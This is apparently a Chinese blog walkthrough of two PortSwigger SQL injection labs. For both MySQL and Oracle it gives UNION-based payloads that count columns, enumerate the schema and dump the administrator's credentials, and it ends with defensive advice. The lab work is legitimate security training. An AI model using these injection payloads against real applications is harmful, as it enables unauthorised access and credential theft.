PortSwigger SQL注入LAB5  LAB6
断列数最后把数据库中的结构信息回显到页面里。但它们的数据库环境并不一样一题侧重 MySQL另一题侧重 Oracle。正因为如此注释符、系统视图这些细节会有差别所以我把这两个 LAB 放在一起来分享也顺便做个对比。LAB5描述LAB6描述【本篇目标】先用 MySQL 题目演示一下我是怎么从列数探测一路做到字段枚举最后拿到 administrator 的密码并登录的。再补一段 Oracle 分支看看同样的题目在 Oracle 中换一种思路是怎样的。一、先记住这类题的通用思路这类 UNION 注入题的主线其实不复杂我一般会把它概括成四步确认注入点通常是一个看起来普通的分类参数。通过 ORDER BY n 判断原查询有几列。用 NULL 对齐列数再尝试把敏感数据带到可回显的列里。根据数据库类型调整注释符和系统函数。如果把这四步牢牢记住后面再看到相似题型时基本就是在切换数据库语法而不是重新发明一套打法。二、MySQL 分支通过列名拿到密码LAB主页LAB登录界面先看 MySQL 这道题。页面上的注入点仍然是 /filter?category…我先把后端查询大致推测出来SELECT * FROM products WHERE category ‘Gifts’2.1 探测列数为了让 UNION 语句成立我得先知道原查询有几列。这里我用 ORDER BY n 逐步测试’ ORDER BY 1–’ ORDER BY 2–’ ORDER BY 3–Burp Suite 抓取结果2当 ORDER BY 3 报错时就说明原查询只有 2 列。这一步是后面所有 UNION 注入的前提。【注释符提醒】MySQL 中 – 后面要保留空格如果在 URL 里直接用记得把空格写成 或 %20。本篇后续示例统一用 – 书写方便阅读。2.2 从信息架构里找字段这道题的核心不是直接猜表名而是先枚举数据库元数据。information_schema.columns 里面保存了列名信息所以我先拿它来找用户名和密码字段Burp Suite 抓取结果3SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, column_name FROM information_schema.columns –筛选结果里会出现两个很显眼的字段username_vadgwn 和 password_txeztd。2.3 反查表名拿到列名之后我再反查它们来自哪个表SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM information_schema.columns WHERE column_name ‘username_vadgwn’ –SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM information_schema.columns WHERE column_name ‘password_txeztd’ –Burp Suite 抓取结果4Burp Suite 抓取结果5两次查询都指向同一个表 users_teluls说明凭据都存放在这里。2.4 回显用户名和密码既然已经确认表名我就可以把用户名和密码直接拼到 UNION 结果里SELECT * FROM products WHERE category ‘’ UNION SELECT username_vadgwn, password_txeztd FROM users_teluls –最终请求可以写成GET /filter?category’ UNION SELECT username_vadgwn,password_txeztd FROM users_teluls -- HTTP/2Burp Suite 抓取结果6把回显结果中的 administrator 密码填回登录页就能直接通过认证。攻击成功【MySQL 分支 Payload】’ UNION SELECT username_vadgwn,password_txeztd FROM users_teluls –三、Oracle 分支通过表名拿到密码Oracle 题和上面的 MySQL 题思路几乎相同不过我想换一种方法也就是先查表名再通过列名来验证是否为正确目标。3.1 查询表名在 MySQL 中我们是通过“人肉扫描”的办法来寻找可疑项的这一次我打算改成用 LIKE 搭配通配符来做模糊搜索。还有一点要注意的是大小写问题。为了防止大小写不一致导致查询结果缺失这里我用了一个 upper 函数把 table_name 转成大写这样搜索时就不会区分大小写了。SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM all_tables WHERE upper(table_name) LIKE ‘%USER%’ –Burp Suite 抓取结果7通过模糊搜索表名我找到了可疑表名 USERS_NRCXBC。3.2 检索列名接下来我再看一下表中的列是不是我要找的用户名和密码。SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name ‘USERS_NRCXBC’ –Burp Suite 抓取结果8可以看到表中的列名分别为 EMAIL、PASSWORD_EBXMBT、USERNAME_MUXIWC说明凭据确实存放在这张表里。3.3 回显用户名和密码确定了表名和列名之后我就可以把用户名和密码直接拼到 UNION 结果里了SELECT * FROM products WHERE category ‘’ UNION SELECT USERNAME_MUXIWC, PASSWORD_EBXMBT FROM USERS_NRCXBC –最终请求可以写成GET /filter?category’ UNION SELECT USERNAME_MUXIWC,PASSWORD_EBXMBT FROM USERS_NRCXBC -- HTTP/2Burp Suite 抓取结果9把回显结果中的 administrator 密码填回登录页就能直接通过认证。攻击成功2【Oracle 分支 Payload】’ UNION SELECT USERNAME_MUXIWC,PASSWORD_EBXMBT FROM USERS_NRCXBC –四、两者的区别如果把这两道题放在一起看最容易混淆的地方其实不是 UNION 的写法而是数据库环境的切换。前面的操作步骤看起来差不多但真正落地时我还是得跟着数据库类型去调整注释符、系统视图和回显思路。对比项 MySQL 分支 Oracle 分支注释符 常用 – 注意后面要带空格 同样可以用 – 但更要留意 URL 编码元数据视图 主要看 information_schema.columns 主要看 all_tables 和 all_tab_columns查询思路 先找列名再反查表名最后回显用户名和密码 先模糊匹配表名再确认列名最后把目标字段直接拼进 UNION所以本质上它们还是同一道类型题先确认注入点再判断列数再按数据库语法去找元数据。只要把这个顺序稳住后面换成别的数据库也只是细节在变思路不会变。五、总结与防御建议这两道实验都属于 UNION 联合查询注入它们共同暴露出的问题也很一致用户输入直接拼接进 SQL错误信息被回显数据库元数据也没有被限制。根本成因我整理成三点产品类别过滤器参数被直接拼接到 SQL 语句中未做安全处理应用将数据库错误直接回显给客户端为列数探测和结构枚举提供反馈数据库账户和敏感表结构缺乏最小权限隔离导致凭据或版本信息可被直接读取。防御措施我也简单列一下参数化查询 —— 将 SQL 代码与用户数据彻底分离关闭详细错误回显 —— 生产环境屏蔽数据库报错细节避免泄露结构信息限制系统元数据访问 —— 对 information_schema 等元数据视图进行访问控制最小权限原则 —— 数据库账户仅授予必要权限统一审计和告警 —— 对高频的 ORDER BY、UNION、系统视图访问行为做监控。

相关新闻

Unity 2021.3与Pico SDK 230实现VR手势交互开发全流程

Unity 2021.3与Pico SDK 230实现VR手势交互开发全流程

1. 项目概述:为什么选择手势交互?最近在做一个面向Pico Neo 3/4的VR项目,客户明确要求“去手柄化”,希望用户能像电影里那样,直接用手势来操作界面、抓取物体。这其实反映了当前VR内容发展的一个趋势:从依赖…

2026/7/22 9:38:23 阅读更多 →
VMware安装CentOS7完整指南与优化配置

VMware安装CentOS7完整指南与优化配置

1. 项目概述在虚拟化技术普及的今天,使用VMware Workstation(简称VM)安装CentOS7仍然是许多开发者和运维人员的首选方案。作为一名长期使用Linux系统的老鸟,我完整记录了从镜像下载到系统配置的全过程,特别针对国内网络…

2026/7/22 9:38:23 阅读更多 →
信创环境下内网考试系统部署与安全实践

信创环境下内网考试系统部署与安全实践

1. 信创背景下的内网考试系统需求分析在数字化转型和国产化替代的大背景下,部队及涉密单位对内部考试培训系统的需求呈现出明显的特殊性。传统基于互联网的SaaS考试平台已无法满足这类单位对数据安全、系统可控性和国产化适配的严格要求。核心需求痛点主要体现在三个…

2026/7/22 9:38:23 阅读更多 →

最新新闻

大模型应用从Demo到生产,Java后端该补算法还是工程基建?

大模型应用从Demo到生产,Java后端该补算法还是工程基建?

如果你正准备往大模型方向转,《大模型岗位变了,Java工程师该补的还是算法吗?》这类问题别只看热度。更重要的是判断自己该补哪块能力,以及怎么证明你真的会。摘要先把这篇文章的目标说清楚:看完之后,你应该…

2026/7/22 10:27:42 阅读更多 →
Switch与PS1模拟器核心技术解析与优化指南

Switch与PS1模拟器核心技术解析与优化指南

1. 项目概述:Switch与PS1模拟器的开源世界 在复古游戏复兴的浪潮中,模拟器技术正经历着前所未有的发展。Ryujinx作为当前最活跃的Switch模拟器开源项目之一,采用C#语言编写,已通过4050项兼容性测试,支持超过3000款游戏…

2026/7/22 10:27:42 阅读更多 →
数据治理体系构建与DMBOK框架实践指南

数据治理体系构建与DMBOK框架实践指南

1. 数据治理的本质与核心挑战 数据治理这个概念在数字化转型浪潮中越来越频繁地被提及,但很多人对它的理解仍然停留在"管数据"的模糊层面。实际上,数据治理远不止是简单的数据管理,而是一套完整的体系化工程。就像城市规划不仅要管…

2026/7/22 10:27:42 阅读更多 →
Windows 11更新致SSD损坏:大文件传输风险与数据抢救指南

Windows 11更新致SSD损坏:大文件传输风险与数据抢救指南

1. 一次“常规”更新引发的存储灾难 如果你是一位经常需要处理大容量数据迁移的摄影师、视频剪辑师,或者负责公司服务器数据备份的IT管理员,那么最近发生在Windows 11上的这件事,绝对值得你停下手中的工作,花几分钟仔细了解一下。…

2026/7/22 10:27:42 阅读更多 →
Unity运动匹配技术:从原理到实现,打造流畅角色动画

Unity运动匹配技术:从原理到实现,打造流畅角色动画

1. 项目概述:为什么我们需要运动匹配? 如果你在Unity里做过角色动画,尤其是那种需要与环境、物体或其他角色进行复杂交互的动画,你肯定遇到过这样的困境:动画师给了你一套精美的待机、行走、奔跑、跳跃动画&#xff0c…

2026/7/22 10:27:42 阅读更多 →
嵌入式DMA控制器寄存器配置与通道控制机制深度解析

嵌入式DMA控制器寄存器配置与通道控制机制深度解析

1. DMA控制器:嵌入式系统的“数据搬运工”与效率引擎在嵌入式系统开发中,尤其是涉及高速数据流处理的场景,比如音频采集、图像传感器数据读取、网络数据包转发,CPU如果亲自去搬运每一个字节的数据,很快就会不堪重负。这…

2026/7/22 10:26:42 阅读更多 →

日新闻

TI DSP系统配置模块SYSCFG详解:中断机制与主设备优先级配置实战

TI DSP系统配置模块SYSCFG详解:中断机制与主设备优先级配置实战

1. 项目概述与SYSCFG模块的核心价值在嵌入式系统,尤其是像TI C6000系列这样的高性能DSP开发中,我们常常会与芯片手册里那些密密麻麻的寄存器打交道。很多开发者可能更关注算法实现、内存优化或者外设驱动,但对于一个稳定、高效的系统而言&…

2026/7/22 0:00:26 阅读更多 →
微信Server酱:高到达率的应急通知方案实践

微信Server酱:高到达率的应急通知方案实践

1. 为什么我们需要"最次"的通知方案? 在数字化协作环境中,消息通知系统的重要性不言而喻明。但现实情况是,企业级通知方案往往需要复杂的API对接(如企业微信、钉钉、飞书),个人开发者的小项目又经…

2026/7/22 0:00:26 阅读更多 →
甲方要的“简洁“PPT,到底是简洁还是省事?

甲方要的“简洁“PPT,到底是简洁还是省事?

甲方说"简洁一点",乙方听到的是"少做几页"。甲方说"不要太复杂",乙方理解成"别放图表了"。结果交过去,甲方说"我说的简洁不是这个意思"。"简洁"这个词在PPT语境里,是…

2026/7/22 0:00:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/21 5:34:47 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/21 8:25:39 阅读更多 →

月新闻